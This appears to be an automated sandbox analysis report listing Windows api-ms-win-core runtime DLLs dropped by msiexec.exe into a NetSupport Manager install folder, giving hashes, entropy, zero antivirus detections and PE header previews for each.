                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):22208
                                                                                      Entropy (8bit):6.906399541614446
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:3CYPvVX8rFTsdWVghW/VvSx9YOCAs/nGfe4pBjSfZCLWNArXVWQ4mWbmqnaj9Rlg:1PvVXfW2hW9SUA0GftpBj8yBlBRAkad
                                                                                      MD5:779A8B14C22E463EA535CBCA9EA84D49
                                                                                      SHA1:4620531D5291878C10D6E3974F240B98BC7FB4B9
                                                                                      SHA-256:FC0551DE11B310DFD8F3FC924F309D5E754B547FFC475CF6C3D007BB5366F148
                                                                                      SHA-512:08882528DF66FC582A890AD64C7F96E8F9DE56D4871A4D9B6B32E1C3FFB0C29B425F4CC893B2575F6697FFAFBB56BA84D43D602483B0470488DF823D445B84E4
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......6....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):6.98650705248822
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:7WVghWu7vSx9YOCAs/nGfe4pBjSby+ggmGWNArXVWQ42WHmMqnaj9RlS6VSyS:7W2hWmSUA0GftpBj+1bMlBRAkS3
                                                                                      MD5:F6D1216E974FB76585FD350EBDC30648
                                                                                      SHA1:F8F73AA038E49D9FCF3BD05A30DC2E8CBBE54A7C
                                                                                      SHA-256:348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271
                                                                                      SHA-512:756EE21BA895179A5B6836B75AEEFB75389B0FE4AE2AAFF9ED84F33075094663117133C810AB2E697EC04EAFFD54FF03EFA3B9344E467A847ACEA9F732935843
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......W5....@.............................L............ ...................<..............8............................................................................text...\........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l2-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):7.046229749504995
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:WUWVghW/zvSx9YOCAs/nGfe4pBjSfEtcsWNArXVWQ4mWV9QqnajxcRGlPMRd54xS:WUW2hW7SUA0GftpBjBj3ll7PedGxC/
                                                                                      MD5:BFB08FB09E8D68673F2F0213C59E2B97
                                                                                      SHA1:E1E5FF4E7DD1C902AFBE195D3E9FD2A7D4A539F2
                                                                                      SHA-256:6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E
                                                                                      SHA-512:E4F33306F3D06EA5C8E539EBDB6926D5F818234F481FF4605A9D5698AE8F2AFDF79F194ACD0E55AC963383B78BB4C9311EE97F3A188E12FBF2EE13B35D409900
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):6.993015464813673
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:6YOWVghW/KgbXH9YOCAs/nGfe4pBjSfSAWNArXVWQ4mW/M2qnaj9RlS6VRob:EW2hWSgbCA0GftpBj8qRlBRAka
                                                                                      MD5:FC68978ABB44E572DFE637B7DD3D615F
                                                                                      SHA1:47D0F1BD5195CE10C5EC06BDB92E85DDA21CDAB3
                                                                                      SHA-256:DF6BED7BCCCAF7298133DF99E497FA70DA761BE99C2A5B2742CFC835BF62D356
                                                                                      SHA-512:7EB601D7482DDDC251898D7EFBDFE003BAB460AF13B3CB12F1D79FDF9D9D26FC9048FD8CA9969B68BBE5547FDCD16F59D980527A5B73B02DA145419834234873
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@............................._............ ...................<..............8............................................................................text...o........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-heap-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19136
                                                                                      Entropy (8bit):6.95985126360952
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:8l6W2hWJ7QA0GftpBj8VbJOAlXBtFwA+S:p+yi2VbJy4
                                                                                      MD5:1CD8672D8C08B39560A9D5518836493E
                                                                                      SHA1:C7CE2330265D07D88AD15F80DD88473F3DAAFCD0
                                                                                      SHA-256:4A5F33A0837A9D9F22D49EE6D062BAE671A4C5C5522DB6FFE03C1AA2C0BD008E
                                                                                      SHA-512:6BCE6EF09746C10E3B3F136BB2CE67002F27FF70C3FCBA48E7F1C3769000A62649A41FD82ACBE2A819B8ECE96D8E9399B15104CA2B40F65B51A0C84FC2A7901C
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19136
                                                                                      Entropy (8bit):6.9718846004654225
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:8vlYsFeW2hWu7QA0GftpBjECp4DlXBtFwCf:8izyiChyG
                                                                                      MD5:B8BB783DEE4EA95576882625C365E616
                                                                                      SHA1:E9AF4B17FC082B5D717BFA013D46DA4BDFFB2CD3
                                                                                      SHA-256:21BD55B9D42A5FAA5FA3C5DD9FAD1665DF3C33557CC4F7A58248A88B69D372B8
                                                                                      SHA-512:B756468DCF7254FD31D3650F794B837724A82207001B521105BE05DF4CF187785897BE8377083C53A92C0DC5AEE2CDAF8B9538FD6944E0AC4BE5D286836037A1
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......`....@.......................................... ...................<..............8............................................................................text...$........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19136
                                                                                      Entropy (8bit):7.018574692016083
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:CbvuBL3BuW2hWO7QA0GftpBjvEcDflBRAkgD:7BL3BGfyidRA1
                                                                                      MD5:44CA070DC5C09FF8588CF6CDCB64E7A2
                                                                                      SHA1:63D1DA68CD984532217BEACC21B868B46EC5D910
                                                                                      SHA-256:EDEB5B3003DB4EE3767FA012E812323FADEF67663C1B45FED3FCA96CAD5AECC8
                                                                                      SHA-512:C3A214550993A56907AA35091112F9F89E0A74375A7C268133A7C06D88E5DE4F9C87F7E0BE5007F00081A772DF724590D38966ED465F92217D3EF2F45A29C237
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-localization-l1-2-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):21184
                                                                                      Entropy (8bit):6.98505637818331
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:9OMw3zdp3bwjGjue9/0jCRrndbVW2hWKgbCA0GftpBjbQywPAOll7PedGGZ:9OMwBprwjGjue9/0jCRrndbzM8iFFGkt
                                                                                      MD5:3B9D034CA8A0345BC8F248927A86BF22
                                                                                      SHA1:95FAF5007DAF8BA712A5D17F865F0E7938DA662B
                                                                                      SHA-256:A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D
                                                                                      SHA-512:04F0830878E0166FFD1220536592D0D7EC8AACD3F04340A8D91DF24D728F34FBBD559432E5C35F256D231AFE0AE926139D7503107CEA09BFD720AD65E19D1CDC
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-memory-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19136
                                                                                      Entropy (8bit):6.986049300390525
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CYaBWVghW/B7l9YOCAs/nGfe4pBjSfaMjWNArXVWQ4mW6qnajMHxxBNT0662ONLD:IBW2hWZ7QA0GftpBjj21lI663Un
                                                                                      MD5:FC13F11A2458879B23C87B29C2BAD934
                                                                                      SHA1:68B15CC21F5541DC2226E9E967E08AF81D04A537
                                                                                      SHA-256:624841916513409C3CFCF45589EB96548C77B829E5D56A5783249D3AB7DC8998
                                                                                      SHA-512:801A23485E42CC224E508212E7114E89747543A20964CF666EE801FCC2FEA97888FAA1AF8DA2AF807C50187969A08C6FCE2A021836811786EF72F4C2BDBDE33C
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................l............ ...................<..............8............................................................................text...|........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):7.04628745407397
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:bhkd6WVghW/vt7l9YOCAs/nGfe4pBjSfWP18gWNArXVWQ4mW0tXqnajL1dHx3tKU:aYW2hWt7QA0GftpBj7PS8rxlXBtFwVoF
                                                                                      MD5:07954AF744363F9807355E4E9408DF45
                                                                                      SHA1:B37D06B39EB7186B55CEAE25427B7AB95E46E32F
                                                                                      SHA-256:4B20AAF0E3B7566B797652F8D84B749AB23F7D1557DBA882C0590FE1BE98CED6
                                                                                      SHA-512:B7A7C16EF8BE62D9F562DCECF01B2AD1C066DE92AA4CA7A8C7BB93A80B1BC781F8A6A47F51A252E40337BD8D7778CACFEE7488A5FAD15F11D24C90572AD0E4C6
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19648
                                                                                      Entropy (8bit):6.961454559139268
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:GkZjWVghW/WgbXH9YOCAs/nGfe4pBjSfr4i6wWNArXVWQ4mWQVUqnajMHxxBNT0u:fjW2hWegbCA0GftpBjc4aolI663Ub2
                                                                                      MD5:39556E904FA2405ABAF27231DA8EF9E5
                                                                                      SHA1:89DB01B04DFDBE5C0F5E856050611A6A72F1AFD0
                                                                                      SHA-256:5F476627A904B182D9B3F142594DEFA267DB3CE8206BAC24AF063A29635B3A8B
                                                                                      SHA-512:558C0D0DD0CE24C7DCDEBAE64578E09ACC36A86B6F121266A147394DD9E8F8B2B81726B9CCC24ED07755950CD13C1D34CAB137E995D0BE25EBF52699D0FBB6B6
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......B.....@......................... ...G............ ...................<..............8............................................................................text...g........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):20672
                                                                                      Entropy (8bit):6.988142648004873
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:0Ok1JzNcKSIxW2hWFSUA0GftpBjluF3sBlvQyURz8o:0pcKSCUi++rvU2o
                                                                                      MD5:39047E168FFBDD19185504633D6ECA29
                                                                                      SHA1:FE3423689EFEDADA19C7DEC3D5DD077A057BF379
                                                                                      SHA-256:611B3E36AD3E0045AB4170A5D4E2D05FD2A26DDE2F7B09EA51F4264E263A544B
                                                                                      SHA-512:8B7D38726E302CDCF5A296E50CCC969B2B122432B93E2B5D1D1F4C1B6C2B3A9B64AF79BB65A7A9EAC31F563AE60934458F9316DD5CBB071FB0A3AD180FAC6103
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......~.....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19136
                                                                                      Entropy (8bit):7.000917619737006
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:QgxDfIeJWVghW/c7l9YOCAs/nGfe4pBjSfxyWNArXVWQ4mWgBHqnaj9RlS6V6Qg:JDfIeJW2hWk7QA0GftpBjxdBHlBRAky
                                                                                      MD5:C2EAD5FCCE95A04D31810768A3D44D57
                                                                                      SHA1:96E791B4D217B3612B0263E8DF2F00009D5AF8D8
                                                                                      SHA-256:42A9A3D8A4A7C82CB6EC42C62D3A522DAA95BEB01ECB776AAC2BFD4AA1E58D62
                                                                                      SHA-512:C90048481D8F0A5EDA2EB6E7703B5A064F481BB7D8C78970408B374CB82E89FEBC2E36633F1F3E28323FB633D6A95AA1050A626CB0CB5EC62E9010491AAE91F4
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-profile-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18112
                                                                                      Entropy (8bit):7.0782836442636174
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:MZeW2hWngbCA0GftpBjPEGVlvQyURz87X:3n8ixEQvU2L
                                                                                      MD5:7697F94ED76B22D83D677B999EDFC2E1
                                                                                      SHA1:42AFB5B8E76B8B77D845156B7124CC3E0C613F91
                                                                                      SHA-256:50FD585270FA79FD056EC04B6991D0E65CCA28C1116834A59D5591F8D8C2C214
                                                                                      SHA-512:1EF120BAA532692D22F8939D9F149035E38DA6B65B889BA6CCB7858596718D569B0B9B35AD3609DE9DAF229553254966BF3D5A6ABC4AF1FF56732CE8560B31C8
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18112
                                                                                      Entropy (8bit):7.072469017642331
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:mG1W2hWhSUA0GftpBjy6oNxll7PedGitM/:mGTgio6CJkGcG
                                                                                      MD5:FDF0B4BF0214585E18EE2F6978F985B0
                                                                                      SHA1:0FE247F8CCA0C04729135EE612FBFCED92D59D9D
                                                                                      SHA-256:CF42C1215695579ADE1842246EC43DA9A9B28E8107957C0C340CE3BA9F689584
                                                                                      SHA-512:D0A249C230520538E8C2759CC0A41444C543DABD6347C8A8231C587EBBA28905AD2DF5E5D6437881C7A02F6DE6212A719ACCA2F6D30F63F8D7A21A26921A1807
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):7.021897050678374
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:5yMvJW2hW2gbCA0GftpBjMv3ulvQyURz8n:5yMvn88ikEvU2n
                                                                                      MD5:687533A89B43510CCE4D8B2ECB261AA0
                                                                                      SHA1:4004BA63880A92042C106FF6A549C6F5F69CE05D
                                                                                      SHA-256:E7272FF3B00508732896BF96F8DAB5AD32FE4531746AB1C228C315F1B4D48156
                                                                                      SHA-512:6A61DD13939BF61342278EFFA07D2654219032F9523D3D552275BD60BD3B125DAD13737924D33F6619C5A7CCACE008B37C3330451411D3BD09E1D2B5064F9AAC
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......A....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):20672
                                                                                      Entropy (8bit):6.936138213943514
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:wdv3V0dfpkXc0vVafW2hWqSUA0GftpBjjQjclvQyURz82u6:wdv3VqpkXc0vVaBziRvU22u6
                                                                                      MD5:88C4CA509C947509E123F22E5F077639
                                                                                      SHA1:AE837C556FF23B9E166288A11E409D21BDDDA4ED
                                                                                      SHA-256:0787FD3D9606B8614F9073C5F04CC6CB153BBF2992297CEBB8C537C066A78C9F
                                                                                      SHA-512:3CCE8C4EA63019ADC6383D5DA7F5969B0B10A55CEEF29083E21F04D23377305325C5CB5F4656955F8ABB5A1E10BEEAC60808DE9D03A72462950469AE49768418
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......a.....@.............................V............ ...................<..............8............................................................................text...f........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-2-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19136
                                                                                      Entropy (8bit):7.030340698171656
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:/tZ34W2hWlgbCA0GftpBjx5C32lI663UG:w18i+66kG
                                                                                      MD5:F6B4D8D403D22EB87A60BF6E4A3E7041
                                                                                      SHA1:B51A63F258B57527549D5331C405EACC77969433
                                                                                      SHA-256:25687E95B65D0521F8C737DF301BF90DB8940E1C0758BB6EA5C217CF7D2F2270
                                                                                      SHA-512:1ACD8F7BC5D3AE1DB46824B3A5548B33E56C9BAC81DCD2E7D90FDBD1D3DD76F93CDF4D52A5F316728F92E623F73BC2CCD0BC505A259DFF20C1A5A2EB2F12E41B
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................v............ ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19648
                                                                                      Entropy (8bit):6.960490184684636
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:nvj+UKIMFsWVghW/AvSx9YOCAs/nGfe4pBjSf3Ir9WNArXVWQ4mWSEqnajMHxxBB:7+UhW2hWISUA0GftpBjdrZolI663UU
                                                                                      MD5:B9EA058418BE64F85B0FF62341F7099E
                                                                                      SHA1:0B37E86267D0C6782E18F734B710817B8B03DA76
                                                                                      SHA-256:653BE79FA676D052CCE60D743282018FAAAF22E15A3CB8F1EEE01F243D56B431
                                                                                      SHA-512:EFAAC54C0C6648F666B58E0441315446FDBCB8544C3B9E2005482DE25E62E716D0C66DCB7A9CEDD7967FFC26E394AE9F1B1DFDCE1D4243CFDE737140D1C3D51D
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................E............ ...................<..............8............................................................................text...U........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-timezone-l1-1-0.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):7.0606914357897885
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:B6awWVghW/d7l9YOCAs/nGfe4pBjSf/pjWNArXVWQ4mWgmqnajLQvTP+8jP9Tz8U:WW2hWF7QA0GftpBjQ9YlvQyURz8RG
                                                                                      MD5:A20084F41B3F1C549D6625C790B72268
                                                                                      SHA1:E3669B8D89402A047BFBF9775D18438B0D95437E
                                                                                      SHA-256:0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1
                                                                                      SHA-512:DDF294A47DD80B3ABFB3A0D82BC5F2B510D3734439F5A25DA609EDBBD9241ED78045114D011925D61C3D80B1CCD0283471B1DAD4CF16E2194E9BC22E8ABF278F
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

